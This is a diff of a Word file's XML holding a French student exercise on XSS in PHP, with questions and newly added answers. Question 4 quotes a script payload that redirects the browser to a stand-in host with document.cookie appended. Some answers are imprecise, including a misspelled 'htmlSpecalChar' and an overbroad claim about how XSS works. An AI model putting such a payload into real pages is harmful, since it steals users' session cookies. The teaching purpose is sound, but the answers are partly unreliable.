--- a/Question/question_mission_2.docx
+++ b/Question/question_mission_2.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
       <w:r>
@@ -9,104 +9,21 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Question </w:t>
-      </w:r>
-      <w:r>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Comment peut-on se protéger d’une faille XSS en PHP (et pourquoi un header http « X-XSS-Protection : 1 » ne serait pas suffisant) ?</w:t>
+        <w:t>Question 2 : Comment peut-on se protéger d’une faille XSS en PHP (et pourquoi un header http « X-XSS-Protection : 1 » ne serait pas suffisant) ?</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Question </w:t>
-      </w:r>
-      <w:r>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Est-ce qu’une faille XSS pourrait amener un hacker à obtenir un login / mot de passe (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashé</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ou pas) et si oui, comment ?</w:t>
+        <w:t>Question 3 : Est-ce qu’une faille XSS pourrait amener un hacker à obtenir un login / mot de passe (hashé ou pas) et si oui, comment ?</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Question </w:t>
-      </w:r>
-      <w:r>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Qu’est-ce qui se passe si je soumets ce contenu dans un site non protégé contre les failles XSS et qu’un utilisateur accède à la page qui présente ce contenu ?</w:t>
+        <w:t>Question 4 : Qu’est-ce qui se passe si je soumets ce contenu dans un site non protégé contre les failles XSS et qu’un utilisateur accède à la page qui présente ce contenu ?</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">&lt;scripte </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>language</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etmlscript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>console.log(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>‘’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>you</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> have been </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hacked</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> by Narut0’’) ;window.location.href=’’https://spoof.cookie.com ?data=’’+</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t> ;&lt;/script&gt;</w:t>
+        <w:t>&lt;scripte language=etmlscript&gt;console.log(‘’you have been hacked by Narut0’’) ;window.location.href=’’https://spoof.cookie.com ?data=’’+document.cookie ;&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -114,20 +31,54 @@
       <w:r>
         <w:t xml:space="preserve">Réponse 1 : </w:t>
       </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Cross-Site Scripting, qu’il risque que ses informations soient redirigées sur le site de l’hacker</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">Réponse 2 : </w:t>
       </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">pour protéger les données entrante et sortante, il suffit de mettre htmlSpecalChar pour sécuriser </w:t>
+      </w:r>
+      <w:r>
+        <w:t>les valeurs. Le header</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>http « X-XSS-Protection : 1</w:t>
+      </w:r>
+      <w:r>
+        <w:t> » ne filtre pas efficacement les scriptes, c’est-à-dire qu’il ne protège pas contre toutes les possibilités d’attaque XSS.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">Réponse 3 : </w:t>
       </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>oui, c’est même le principe du XSS, le hacker redirige l’utilisateur sur un site qui ressemble au site de base et que l’utilisateur rentre des données c’est le hacker qui les récupères, login et mot de passe inclue</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">Réponse 4 : </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>il affiche dans la console web « </w:t>
+      </w:r>
+      <w:r>
+        <w:t>’you have been hacked by Narut0</w:t>
+      </w:r>
+      <w:r>
+        <w:t> » et il redirige sur son site avec les cookie de l’utilisateur (vole de cookie).</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -142,7 +93,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="45E11604"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -229,14 +180,14 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="179316334">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
